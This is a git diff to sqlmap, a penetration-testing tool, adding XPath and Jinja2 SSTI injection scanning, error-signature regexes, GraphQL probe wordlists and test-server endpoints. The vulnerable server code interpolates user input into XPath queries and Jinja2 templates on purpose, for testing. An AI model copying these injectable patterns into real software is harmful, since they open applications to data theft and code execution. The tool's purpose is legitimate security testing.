diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml
index 7f3268e69a..367bec2140 100644
--- a/.github/workflows/tests.yml
+++ b/.github/workflows/tests.yml
@@ -93,6 +93,14 @@ jobs:
- name: Basic import test
run: python -c "import sqlmap; import sqlmapapi"
+ - name: Install optional test deps (lxml, jinja2)
+ # lxml has no PyPy-2.7 wheel and 5.x is Py3-only, so it cannot be pip-installed there. The
+ # tests that use it (test_xpath's real-XPath checks, and the --xpath/--ssti vuln-test
+ # endpoints) skip themselves when the engine is unavailable, so these deps are only needed
+ # on the Py3 jobs.
+ if: matrix.python-version != 'pypy-2.7'
+ run: python -m pip install -q lxml jinja2
+
- name: Unit tests
# -B: do not write .pyc files. On Python 2 / PyPy a cached .pyc makes a module's __file__
# point at the .pyc, which would make the later --smoke getFileType(__file__) doctest see
diff --git a/data/txt/sha256sums.txt b/data/txt/sha256sums.txt
index f8337e8c87..f5165aed77 100644
--- a/data/txt/sha256sums.txt
+++ b/data/txt/sha256sums.txt
@@ -160,10 +160,10 @@ ca86d61d3349ed2d94a6b164d4648cff9701199b5e32378c3f40fca0f517b128 extra/shutils/
df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh
1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 extra/vulnserver/__init__.py
-32577fc21a6170266438b608ed81620e0b0a889aa8a05124bc7f0905cba772a6 extra/vulnserver/vulnserver.py
+617cec1b731e0baacafa6f58c2f56a85b6128d1416627cc1b2f61519c8539a2e extra/vulnserver/vulnserver.py
a2bf70d7f87c3a4e0675c0bad54119a4e04efa6ea2730a8338d5aebcd995630e lib/controller/action.py
-c9a1661fc6719655e1e5b6dd72caab680766690c5f746b386093267329f7b3b8 lib/controller/checks.py
-256ba0c6967121dc25c95fe09d1165dd8d0530f26c7879e6036f649fb0a6de95 lib/controller/controller.py
+9137a8f7368496c84b21944f6b94c28004d3a2a849ac9c8e0b20e294e4c4a93a lib/controller/checks.py
+4598de22ed3df63432e9643ba48533a01bec9f0b253c3a11f322ccedaef353f0 lib/controller/controller.py
d69e84f1648cdb907f5d2dd454f03874a4613752b07867510145d51d84b3c56f lib/controller/handler.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/controller/__init__.py
9c5764c92ce536d1f0f96200359ee5ef1f37f9128769bf990cb77f1d1f8e17b1 lib/core/agent.py
@@ -181,7 +181,7 @@ f8de57606325456928e46ae2896f5f8bbec9ad18b1c644b492a566fa992216f6 lib/core/decor
5387168e5dfedd94ae22af7bb255f27d6baaca50b24179c6b98f4f325f5cc7b4 lib/core/exception.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/core/__init__.py
914a13ee21fd610a6153a37cbe50830fcbd1324c7ebc1e7fc206d5e598b0f7ad lib/core/log.py
-1b03686e1aa916ccad3cd86b8e4e6ea4baca5e30e05bf86a56f8df8dd4f44ba6 lib/core/optiondict.py
+33ed53b263fa766a808be6797dd812822bb115d3b9db6e3a34763f500f5359e8 lib/core/optiondict.py
e033b20a0f7821797a10f4bf4235723f38c7db551c611fbb713faa621b123c4a lib/core/option.py
21b2b1745107c211fc7593923a3da7a808d40763c00091c28de5f7c129bcf3bc lib/core/patch.py
49c0fa7e3814dfda610d665ee02b12df299b28bc0b6773815b4395514ddf8dec lib/core/profiling.py
@@ -189,18 +189,18 @@ e033b20a0f7821797a10f4bf4235723f38c7db551c611fbb713faa621b123c4a lib/core/optio
9bf174058f15d14e24e94f9aaf42df045119d3617c6c54bd2f3af79b462f331d lib/core/replication.py
0b8c38a01bb01f843d94a6c5f2075ee47520d0c4aa799cecea9c3e2c5a4a23a6 lib/core/revision.py
888daba83fd4a34e9503fe21f01fef4cc730e5cde871b1d40e15d4cbc847d56c lib/core/session.py
-e9aae7dacf83a4d7054862eeb0a96ed695731cd87f8b03836a8a41c7454d0f5f lib/core/settings.py
+0a99ba2412606979d02c25ab63d0d92bfe3f2a262d6405a740841f5df83970ba lib/core/settings.py
c7804223319e18eb0b8e2cbf0a8b6896d1cefb7b0b1a2e9f1cf826a8a3b56750 lib/core/shell.py
a2e98a94b231432736d6b304fc75525c8b5fdb4768c418387c5b4c1a610dad64 lib/core/subprocessng.py
19f1e3c5e3ba703d28d510cd7a9ab8284d5fbe9df5ce7e77c86e5931571364b7 lib/core/target.py
-46b405d0e0e035b3f323deffc1f1d30505adf7c01144ea2ddf81c5dc6caaa20f lib/core/testing.py
+073cc21334519624288bbf25060ab4e8102cbe6ec15e706992e639716075af8d lib/core/testing.py
95656c44bab1771f4808030dd6a17eae5b129cb1234443f00b19695c7b712b86 lib/core/threads.py
b9aacb840310173202f79c2ba125b0243003ee6b44c92eca50424f2bdfc83c02 lib/core/unescaper.py
53e396902cb2546eaa09e77073fcba8be8827ee9ce055cfc899e81b0e6ad4d6d lib/core/update.py
2400e465fa4d13e4c32795910878c71ff212e4361b46428d57ce43983f5e997c lib/core/wordlist.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/__init__.py
54bfd31ebded3ffa5848df1c644f196eb704116517c7a3d860b5d081e984d821 lib/parse/banner.py
-8351588876a7579fa96b3ab860ef2254487de34ea624c0a7696f2428c24ceb98 lib/parse/cmdline.py
+316cdcb3d8d839dab639ed7eb4935780375d49c93371edbd6224976cbb968c2e lib/parse/cmdline.py
02d82e4069bd98c52755417f8b8e306d79945672656ac24f1a45e7a6eff4b158 lib/parse/configfile.py
c5b258be7485089fac9d9cd179960e774fbd85e62836dc67cce76cc028bb6aeb lib/parse/handler.py
5c9a9caee948843d5537745640cc7b98d70a0412cc0949f59d4ebe8b2907c06c lib/parse/headers.py
@@ -240,15 +240,19 @@ a66a4b9df6207dce722c9b71d290ea426723cb4b697b416065dc7dd5db96fe8e lib/techniques
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/error/__init__.py
5bbef46c16e34fd80e3f9f0e9aa255ce2e39be0d0e57479e25890b041c7efc7d lib/techniques/error/use.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/graphql/__init__.py
-ffbc7583a563bb9fe5a560ca8363f3e4ec84ecf907b956883ab1f2904f19d529 lib/techniques/graphql/inject.py
+c3e5cf7e5e35ae5fd86b63a515b37e6f06e61c70d2690252f2ee8373aa16637e lib/techniques/graphql/inject.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/__init__.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/ldap/__init__.py
-cc90c641d74244e45fa0c8c4026315452137e66b6fb5cef681d0eacd4e11eb69 lib/techniques/ldap/inject.py
+039d64a610b0e92e953fa6eaa740e7c2867e34e12b82e0113204e8f6100dc368 lib/techniques/ldap/inject.py
44401cad3e39ae9fb899ed5d0e2fdd0879561de05c3117f17f3b0db54f4e3724 lib/techniques/nosql/__init__.py
-e2cd2b19f82393f9bbc8f374686cd851a4ccc264bb898ea54547ec479a05674c lib/techniques/nosql/inject.py
+e465d9cb6ac83dafe38aeec851856183b93f5aa19f628fb64371a290797e2518 lib/techniques/nosql/inject.py
+1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/ssti/__init__.py
+29ab841b6129106f19db692a5a30f90a5e758d6cd24d47da0a35c8090910ae18 lib/techniques/ssti/inject.py
1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/union/__init__.py
ceec65f8cb7c3254c4671351c837418c76ac5bc55ccbc40779f67231b54d7085 lib/techniques/union/test.py
c65766f71e285fc85cdf58e7448c4c1d015af2a9dbb44fa3b665a9f13362fbcc lib/techniques/union/use.py
+1966ca704961fb987ab757f0a4afddbf841d1a880631b701487c75cef63d60c3 lib/techniques/xpath/__init__.py
+c61816c9dba9f6cc2223aed1a923f95130979e5f0a88ec254ee667d955ed2734 lib/techniques/xpath/inject.py
aeefb42ea0c68f72744bc1bfd7194ec1bc06480d8a7e23f4b8d3d23fbba2b014 lib/utils/api.py
442555ab85277aff7c9e0cf465ea5b0d28395c326f68363449b2d3941f4b6de2 lib/utils/brute.py
da5bcbcda3f667582adf5db8c1b5d511b469ac61b55d387cec66de35720ed718 lib/utils/crawler.py
@@ -584,7 +588,7 @@ d16977d057c28888aa41500f79a19789cadef693cb8b7d9a3bca55b983ce2266 tests/test_age
feb763ddcbf4f32822372ca53f8c71c754af7b72510ef06e1e9c77927fc90b10 tests/test_bigarray.py
36bcb68483d824db5d05870fab62f1907221bf256826b734302fbc15a9231c42 tests/test_brute.py
27ad87c0ea377e0657bd6f6a4eaa0e9756aa9d28ec0483bdadeb3f66dcc4660d tests/test_charset.py
-c99b77cc5d85334f147a1a6d4b2867af396f70e9f2609f8587344e084910e893 tests/test_checks.py
+7596fc69678304923b5c945c0fd9b8ee62a2dfc7fb14ccb6dc7af30893dc8012 tests/test_checks.py
9e678a56e16211c49ab4995b6c658d3f122bfa3b357d9e17ff38f5a489ace6ad tests/test_cloak.py
2ec894f49ca9bd750a23ead16dae176bcbc57d18ec5847fa4a5eeb886d75c1bd tests/test_common_helpers.py
cdacb37cbe5667fded00abe62a822e11c917e9cb5c3f664b7aa1a8d738412ed4 tests/test_common.py
@@ -611,10 +615,10 @@ bb6991260a994fcbe79e05febaa34affd5631d02299fbc626820addd5f6ea4f4 tests/test_err
26730151abea598f193131c5d64ef92b531941972f3d6236f9951c3116030b1c tests/test_filesystem.py
16fba97cba6afe8af11aa30bcc4266f53b00f2530161e010af10b51db1509703 tests/test_fingerprint.py
20844dfc758e99b2f757906c51ef32aca0f699283ec5aa629158d3dc0fd279ea tests/test_generic_takeover.py
-bde97a4781c4ee84e0fe86f7a33206f114167eb14b704013ecf1c26b838193d7 tests/test_graphql.py
+f1f38f8b8ca667caadcb027d1a20eb895be4ef0935511114db235e66903bb463 tests/test_graphql.py
50b71422ee91b9a4864f4d5ce6c9bdf169dc5f57ed1db05c152eb010c282136b tests/test_gui_helpers.py
92648f2fe81e22c5726b198bbbda14961cd4d3294a0d9139dcea808b324142ac tests/test_har.py
-70919c6ee8fbb3d619873489c819fa37d9035beb2e9b658cc5aa531d86a40380 tests/test_hash_crack.py
+cc7677bc6c568c395112c1aa7d01e1d664e4d5940c86cb4d44987172864bae6f tests/test_hash_crack.py
0336c875dd2b6554bff6eafd746229e38c69ca8070cd933d45cf27c82ef3e05f tests/test_hashdb.py
c04e8358fb6df45f69f2f26435c971acde280535bf304e84d30cf2681158c6a7 tests/test_hash.py
d539d0ae758b5bb91e314ab82ab4fe03d6fb2f8b377d16aefa6d7d1d77a7d5a9 tests/test_identifiers_output.py
@@ -639,6 +643,7 @@ cec98d72992c0799229a780fa7f0d7f3fb01ec2d708187ce0e4a05c8612f291b tests/test_saf
a1c6cda1e5b483f61e6a4f8ddd0b06a15ddaa3fd2119bfb9dbd9cc970d7a751d tests/test_settings_regex.py
29d0278e3718b0fee422d3f6bb85ca02560138d48cd76f9fe1f35ac19d96071b tests/test_sgmllib.py
d3d991331096e16e5019de3d652e9fff92c09bd9f97c50b1c2c3ceb0ed49b17e tests/test_sqlparse.py
+4a9409a070770cc6300ed2b0c954254273479252fa602ffd19d78917f895756c tests/test_ssti.py
8bcbf1091134dd0a62f6201f8b3645ed87b5ff2f7ba40a87231a29dac412591f tests/test_strings.py
8f1c5f0f337ecd26d35c5551060034e0aa33a62cce5385fc1227fdc485f6383e tests/test_tamper.py
67472bd71c20782cc0f738e2c2e674c29d6985669e14d15b69baef7d0e33de62 tests/test_target_parsing.py
@@ -650,10 +655,11 @@ f49bcce1df533ffa1acfd02af43faf6687b21eebda9362ceb1e5871b8cb37fd4 tests/test_thr
48b0ae4abe0fdde8ce4975c5cbf4c3514a2815021cb2e3a490a189bea5edfe78 tests/test_unpickle_security.py
4b646f513c6da1e33200184ed6eabe0aa345eb2e2a19598dc123e191168591bf tests/test_urls.py
eca021208e388b4d14c53f1e9f8a6e7d685e54ba572fb2a8487e6b620a20bcb5 tests/test_users_enum.py
-23ffd75b5aec33066e6d6aad01ab2c9c1b12ee20c1a0990f8f1be81f1ad16161 tests/_testutils.py
+045f05f958100adc883b3f56613c5f8002dd19d0752225397a1f771775cb2779 tests/_testutils.py
2364db35025a53ea4e5a0a80c034997642785f7e6d1566d0d0f1db959fe3c82e tests/test_utils.py
93ef9944effc62d4f744c57bd643137c90fd92205c6a6cbe891e0e99efb80a7f tests/test_wafbypass.py
81bb6d7449f224fa337734ae361c1a340bf9a51768a854d6a1a6e718ed1263ca tests/test_wordlist.py
+2698060e7f001e054e345512ce95be458d9902b913afa769398b53145475738a tests/test_xpath.py
55eaefc664bd8598329d535370612351ec8443c52465f0a37172ea46a97c458a thirdparty/ansistrm/ansistrm.py
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 thirdparty/ansistrm/__init__.py
f597b49ef445bfbfb8f98d1f1a08dcfe4810de5769c0abfab7cdce4eebbfcae7 thirdparty/beautifulsoup/beautifulsoup.py
diff --git a/extra/vulnserver/vulnserver.py b/extra/vulnserver/vulnserver.py
index 99189fbab7..f20c318ebc 100644
--- a/extra/vulnserver/vulnserver.py
+++ b/extra/vulnserver/vulnserver.py
@@ -217,6 +217,84 @@ def nosql_match(params):
else: # $eq, $in (single-valued here) and any literal equality
return record == value
+# --- XPath endpoint (vulnerable search and login, backed by an in-memory XML document) ------------
+
+XPATH_XML = """
+
+
+
+ luther
+ Luther Blisset
+ luther@example.com
+ db3a16990a0008a3b04707fdef6584a0
+ System Administrator
+ London
+ +1 555 0100
+
+
+ fluffy
+ Fluffy Bunny
+ fluffy@example.com
+ 4db967ce67b15e7fb84c266a76684729
+ Security Engineer
+ Amsterdam
+ +1 555 0102
+
+
+ wu
+ Wu Ming
+ wu@example.com
+ f5a2950eaa10f9e99896800eacbe8275
+ Network Administrator
+ Shanghai
+ +86 21 555 0103
+
+
+
+
+ linus
+ Linus Torvalds
+ linus@example.com
+ 8e7b6a5c4d321908f7e6d5c4b3a2910f
+ Kernel Developer
+ Portland
+ +1 555 0200
+
+
+ ada
+ Ada Lovelace
+ ada@example.com
+ 1a2b3c4d5e6f7081920a1b2c3d4e5f60
+ Algorithm Designer
+ London
+ +44 20 555 0201
+
+
+
+
+ grace
+ Grace Hopper
+ grace@example.com
+ 9e8d7c6b5a493827160e9d8c7b6a5948
+ CTO
+ New York
+ +1 555 0300
+
+
+"""
+
+def _xpath_element_to_dict(el):
+ """Recursively convert an lxml element to a JSON-serializable dict: its attributes plus 'tag', stripped 'text' and (only when it has child elements) 'children'. An attribute named 'tag', 'text' or 'children' is overwritten by these keys."""
+ retVal = dict(el.attrib)
+ retVal["tag"] = el.tag
+ retVal["text"] = (el.text or "").strip()  # falsy el.text (e.g. no text node) becomes ""
+ children = []
+ for child in el:
+ children.append(_xpath_element_to_dict(child))
+ if children:
+ retVal["children"] = children  # key is omitted entirely for leaf elements
+ return retVal
+
_conn = None
_cursor = None
_lock = None
@@ -889,6 +967,83 @@ def do_REQUEST(self):
self.wfile.write(output.encode(UNICODE_ENCODING))
return
+ if self.url == "/xpath/search":
+ self.send_response(OK)
+ self.send_header("Content-type", "application/json; charset=%s" % UNICODE_ENCODING)
+ self.send_header("Connection", "close")
+ self.end_headers()
+
+ q = self.params.get("q", "")
+ entries = []
+ error = None
+
+ if q:
+ try:
+ from lxml import etree
+ root = etree.fromstring(XPATH_XML.encode("utf-8"))
+ # VULNERABLE: unsanitized user input directly interpolated into XPath
+ xpath_expr = "/directory/department/user[contains(username,'%s') or contains(realname,'%s')]" % (q, q)
+ elements = root.xpath(xpath_expr)
+ entries = [_xpath_element_to_dict(el) for el in elements]
+ except Exception as ex:
+ error = "%s: %s" % (type(ex).__name__, str(ex))
+
+ output = json.dumps({"entries": entries, "count": len(entries), "error": error}, default=str)
+ self.wfile.write(output.encode(UNICODE_ENCODING))
+ return
+
+ if self.url == "/xpath/login":
+ self.send_response(OK)
+ self.send_header("Content-type", "application/json; charset=%s" % UNICODE_ENCODING)
+ self.send_header("Connection", "close")
+ self.end_headers()
+
+ username = self.params.get("username", "")
+ password = self.params.get("password", "")
+ error = None
+ authenticated = False
+
+ if username and password:
+ try:
+ from lxml import etree
+ root = etree.fromstring(XPATH_XML.encode("utf-8"))
+ # VULNERABLE: unsanitized interpolation into XPath login expression
+ xpath_expr = "/directory/department/user[username='%s' and password='%s']" % (username, password)
+ results = root.xpath(xpath_expr)
+ if results:
+ authenticated = True
+ except Exception as ex:
+ error = "%s: %s" % (type(ex).__name__, str(ex))
+
+ output = json.dumps({"authenticated": authenticated, "error": error}, default=str)
+ self.wfile.write(output.encode(UNICODE_ENCODING))
+ return
+
+ if self.url == "/ssti/search":
+ self.send_response(OK)
+ self.send_header("Content-type", "text/html; charset=%s" % UNICODE_ENCODING)
+ self.send_header("Connection", "close")
+ self.end_headers()
+
+ q = self.params.get("q", "")
+ output = "
"
+
+ if q:
+ try:
+ from jinja2 import Template
+ # VULNERABLE: unsanitized user input passed to Jinja2 template engine
+ template = Template("Hello " + q)
+ output += template.render()
+ except Exception as ex:
+ # Leak template engine error for error-based detection
+ output += "%s: %s" % (type(ex).__name__, str(ex))
+ else:
+ output += "Hello"
+
+ output += ""
+ self.wfile.write(output.encode(UNICODE_ENCODING))
+ return
+
if self.url == '/':
if not any(_ in self.params for _ in ("id", "query")):
self.send_response(OK)
diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index f51d42000b..4589599de4 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -83,6 +83,8 @@
from lib.core.settings import HEURISTIC_CHECK_ALPHABET
from lib.core.settings import INFERENCE_EQUALS_CHAR
from lib.core.settings import LDAP_ERROR_REGEX
+from lib.core.settings import SSTI_ERROR_REGEX
+from lib.core.settings import XPATH_ERROR_REGEX
from lib.core.settings import IPS_WAF_CHECK_PAYLOAD
from lib.core.settings import IPS_WAF_CHECK_RATIO
from lib.core.settings import IPS_WAF_CHECK_TIMEOUT
@@ -1194,6 +1196,20 @@ def _(page):
if conf.beep:
beep()
+ if not conf.xpath and re.search(XPATH_ERROR_REGEX, page or ""):
+ infoMsg = "heuristic (XPath) test shows that %sparameter '%s' might be vulnerable to XPath injection (rerun with switch '--xpath')" % ("%s " % paramType if paramType != parameter else "", parameter)
+ logger.info(infoMsg)
+
+ if conf.beep:
+ beep()
+
+ if not conf.ssti and re.search(SSTI_ERROR_REGEX, page or ""):
+ infoMsg = "heuristic (SSTI) test shows that %sparameter '%s' might be vulnerable to server-side template injection (rerun with switch '--ssti')" % ("%s " % paramType if paramType != parameter else "", parameter)
+ logger.info(infoMsg)
+
+ if conf.beep:
+ beep()
+
kb.disableHtmlDecoding = False
kb.heuristicMode = False
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 2294a66c1a..0ce4960a20 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -543,6 +543,16 @@ def start():
ldapScan()
continue
+ if conf.xpath:
+ from lib.techniques.xpath.inject import xpathScan
+ xpathScan()
+ continue
+
+ if conf.ssti:
+ from lib.techniques.ssti.inject import sstiScan
+ sstiScan()
+ continue
+
if conf.nullConnection:
checkNullConnection()
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index 42c187c89b..69d76f7044 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -120,6 +120,9 @@
"technique": "string",
"nosql": "boolean",
"graphql": "boolean",
+ "ldap": "boolean",
+ "xpath": "boolean",
+ "ssti": "boolean",
"timeSec": "integer",
"uCols": "string",
"uChar": "string",
@@ -170,6 +173,8 @@
"lastChar": "integer",
"sqlQuery": "string",
"sqlShell": "boolean",
+ "sstiQuery": "string",
+ "sstiShell": "boolean",
"sqlFile": "string",
},
diff --git a/lib/core/settings.py b/lib/core/settings.py
index f2d89666b0..413ffb4cfa 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -20,7 +20,7 @@
from thirdparty import six
# sqlmap version (...)
-VERSION = "1.10.6.188"
+VERSION = "1.10.6.194"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -878,7 +878,15 @@
NOSQL_MAX_LENGTH = 1024
# GraphQL endpoint paths to probe when the user supplies a base URL with --graphql (no explicit /graphql)
-GRAPHQL_ENDPOINT_PATHS = ("/graphql", "/api/graphql", "/v1/graphql", "/graphql/api", "/graph", "/gql")
+GRAPHQL_ENDPOINT_PATHS = ("/graphql", "/api/graphql", "/v1/graphql", "/api/v1/graphql", "/graphql/api", "/graphql/console", "/graphql.php", "/graphiql", "/graph", "/gql", "/query")
+
+# Seed field/argument names used to recover a GraphQL schema from "Did you mean" suggestion error
+# messages when introspection is disabled (the field-suggestion / "Clairvoyance" technique)
+GRAPHQL_FIELD_WORDLIST = ("user", "users", "me", "search", "login", "node", "post", "posts",
+ "account", "accounts", "profile", "product", "products", "order", "orders", "item", "items",
+ "customer", "find", "get", "list", "comment", "comments", "message", "messages", "updateUser")
+GRAPHQL_ARG_WORDLIST = ("id", "username", "user", "name", "term", "query", "q", "search",
+ "email", "input", "password", "key", "filter", "slug", "title", "uid")
# Canonical GraphQL introspection query (the one everyone copy-pastes). Returned schema carries the
# full type system: query/mutation/subscription roots, OBJECT/INPUT_OBJECT/ENUM/SCALAR types, their
@@ -967,6 +975,9 @@
# Upper bound for the value-length search during LDAP blind extraction
LDAP_MAX_LENGTH = 256
+# Maximum number of directory entries enumerated during LDAP blind dumping
+LDAP_MAX_RECORDS = 20
+
# Attributes that definitively identify the backend vendor when probed on the RootDSE or
# a well-known directory entry. Each tuple is (attribute, expected_value_substring, backend).
LDAP_FINGERPRINT_ATTRIBUTES = (
@@ -977,6 +988,63 @@
("vendorName", "Red Hat", "389 Directory Server"),
)
+# XPath error signatures per parser implementation for error-based detection and
+# fingerprinting (matched against HTTP response bodies). Each tuple is
+# (backend_name, regex_fragment).
+XPATH_ERROR_SIGNATURES = (
+ ("Java JAXP / Xalan", r"(?:javax\.xml\.(?:xpath\.XPathExpressionException|transform\.Transformer(?:Configuration)?Exception)|com\.sun\.org\.apache\.xpath\.(?:XPathException|XPathProcessorException)|org\.apache\.xpath|org\.xml\.sax\.SAX(?:Parse)?Exception)"),
+ ("Java JAXP / Xalan", r"XPath (?:expression|syntax) error"),
+ ("Java JAXP / Saxon", r"net\.sf\.saxon\.(?:trans\.XPathException|s9api\.SaxonApiException)"),
+ ("Java JAXP / Saxon", r"(?:XPST|XPTY|XPDY|XQST|XTDE)\d{4}:"),
+ (".NET XPathNavigator", r"System\.Xml\.(?:XPath\.XPathException|XmlException)"),
+ (".NET XPathNavigator", r"Expression must evaluate to a node-set"),
+ (".NET XPathNavigator", r"has an invalid (?:token|qualified name)"),
+ ("lxml / libxml2", r"(?:lxml\.etree\.(?:XPath(?:Eval|Document|Syntax)?Error)|libxml2|xmlXPath(?:CompOp|Eval|Err))"),
+ ("lxml / libxml2", r"(?:XPath error|Invalid (?:expression|predicate))"),
+ ("PHP SimpleXML / DOMXPath", r"(?:SimpleXMLElement::xpath\(\)|DOMXPath::(?:query|evaluate)\(\))"),
+ ("PHP SimpleXML / DOMXPath", r"Invalid expression|xmlXPathEval"),
+ ("Saxon (standalone)", r"(?:net\.sf\.saxon\.(?:s9api\.SaxonApiException|trans\.XPathException)|Saxon error)"),
+ ("Saxon (standalone)", r"Static error\(s\) in query"),
+ ("BaseX", r"org\.basex\.(?:query\.QueryException|core\.BaseXException)"),
+ ("BaseX", r"\[(?:XPST|XPTY|XPDY)\d{4}\]"),
+ ("eXist", r"org\.exist\.xquery\.(?:XPathException|XQueryException)"),
+ ("eXist", r"exerr:ERROR"),
+ ("Python ElementTree", r"xml\.etree\.ElementTree\.(?:ParseError|Element)"),
+ ("Generic XPath", r"(?:XPath|XSLT).*?(?:error|exception|syntax)"),
+ ("Generic XPath", r"Invalid XPath|XPath evaluation failed"),
+)
+
+XPATH_ERROR_REGEX = r"(?i)(?:%s)" % '|'.join(regex for _, regex in XPATH_ERROR_SIGNATURES)
+
+# Printable-ASCII codepoint bounds bisected during XPath blind character extraction
+XPATH_CHAR_MIN = 0x20
+XPATH_CHAR_MAX = 0x7e
+
+# Maximum tree depth for recursive XML walking during XPath blind extraction
+XPATH_MAX_DEPTH = 32
+
+# Upper bound for the value-length search during XPath blind extraction
+XPATH_MAX_LENGTH = 256
+
+# SSTI error signatures per template engine for detection and fingerprinting.
+# Each tuple is (engine_name, regex_fragment).
+SSTI_ERROR_SIGNATURES = (
+ ("Jinja2", r"jinja2\.exceptions\.\w+|TemplateSyntaxError|UndefinedError|TemplateNotFound|TemplateAssertionError"),
+ ("Twig", r"Twig[\\_]Error|Twig[\\_]Environment|Unknown (?:filter|function|test|tag)"),
+ ("Freemarker", r"freemarker\.(?:core|template|extract|cache)\.\w+|ParseException|InvalidReferenceException|TemplateException"),
+ ("Velocity", r"org\.apache\.velocity\.(?:runtime|exception)\.\w+|ParseErrorException|MethodInvocationException|ResourceNotFoundException"),
+ ("Spring EL / Thymeleaf", r"org\.springframework\.expression\.\w+|org\.thymeleaf\.\w+|SpelEvaluationException|TemplateProcessingException|ExpressionParsingException"),
+ ("ERB", r"\(erb\):\d+|NameError.*undefined local variable"),
+ ("Pug/Jade", r"pug|jade|ParseError"),
+ ("Handlebars", r"handlebars|Handlebars|Parse error on line"),
+ ("Generic SSTI", r"template.*?(?:error|syntax|exception)"),
+)
+
+SSTI_ERROR_REGEX = r"(?i)(?:%s)" % '|'.join(regex for _, regex in SSTI_ERROR_SIGNATURES)
+
+# Upper bound for SSTI value extraction (reserved for future use)
+SSTI_MAX_LENGTH = 256
+
# Length of prefix and suffix used in non-SQLI heuristic checks
NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6
diff --git a/lib/core/testing.py b/lib/core/testing.py
index 158a218e30..ba7d48139e 100644
--- a/lib/core/testing.py
+++ b/lib/core/testing.py
@@ -91,6 +91,8 @@ def vulnTest():
("-u \"nosql?name=luther&password=x\" -p password --nosql --flush-session", ("is vulnerable to NoSQL injection", "back-end: 'MongoDB'", "NoSQL: GET parameter 'password'", "s3cr3t")), # NoSQL (MongoDB) operator-injection detection + blind regexp extraction
("-u \"graphql\" --graphql --flush-session --disable-hashing", ("found GraphQL endpoint", "introspection returned", "skipping 2 mutation slot", "GraphQL boolean-based blind", "in-band data exposure", "back-end DBMS: 'SQLite'", "banner: '3.", "GraphQL database tables", "fetched 30 entries from table 'creds'", "db3a16990a0008a3b04707fdef6584a0", "GraphQL scan complete")), # GraphQL: endpoint detection + introspection + mutation-skip + boolean-blind/in-band + back-end fingerprint + batched blind dump of an injection-only table (SQLite-backed)
("-u \"ldap/search?q=x\" --ldap --flush-session --disable-hashing", ("is vulnerable to LDAP injection", "Title: LDAP in-band data exposure", "LDAP: GET parameter 'q' in-band entries", "in-band data exposure", "LDAP scan complete")), # LDAP: error-based detection (unbalanced paren) + boolean oracle + directory attribute extraction via blind substring probing
+ ("-u \"xpath/search?q=x\" --xpath --flush-session --disable-hashing", ("is vulnerable to XPath injection", "Title: XPath boolean-based blind", "XPath: GET parameter 'q' XML tree", "extracted", "XPath scan complete")), # XPath: error-based detection + boolean oracle + blind XML tree-walking via starts-with character extraction
+ ("-u \"ssti/search?q=x\" --ssti --flush-session --disable-hashing", ("is vulnerable to SSTI", "Title: SSTI Jinja2 injection", "back-end template engine: 'Jinja2'", "in-band arithmetic proof confirmed", "SSTI scan complete")), # SSTI: Jinja2 detection via arithmetic control-pair + boolean oracle + distinguishing probe
("-u \"&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")),
("-d \"\" --flush-session --dump -T creds --dump-format=SQLITE --binary-fields=password_hash --where \"user_id=5\"", ("3137396164343563366365326362393763663130323965323132303436653831", "dumped to SQLITE database")),
("-d \"\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=4; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "4,foobar,nameisnull", "'987654321'",)),
@@ -98,6 +100,20 @@ def vulnTest():
("--purge -v 3", ("~ERROR", "~CRITICAL", "deleting the whole directory tree")),
)
+ # The vulnserver's XPath endpoint renders with lxml and its SSTI endpoint with jinja2; where those
+ # optional third-party engines are not importable (e.g. PyPy 2.7, which has no lxml wheel), skip
+ # just those entries instead of failing the whole run - the rest of the suite is unaffected.
+ try:
+ __import__("lxml")
+ except ImportError:
+ TESTS = tuple(_ for _ in TESTS if "--xpath" not in _[0])
+ logger.warning("skipping the XPath vuln-test entry ('lxml' not available)")
+ try:
+ __import__("jinja2")
+ except ImportError:
+ TESTS = tuple(_ for _ in TESTS if "--ssti" not in _[0])
+ logger.warning("skipping the SSTI vuln-test entry ('jinja2' not available)")
+
retVal = True
count = 0
cleanups = []
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 72e43e1e65..3a134484c7 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -415,15 +415,6 @@ def cmdLineParser(argv=None):
techniques.add_argument("--technique", dest="technique",
help="SQL injection techniques to use (default \"%s\")" % defaults.technique)
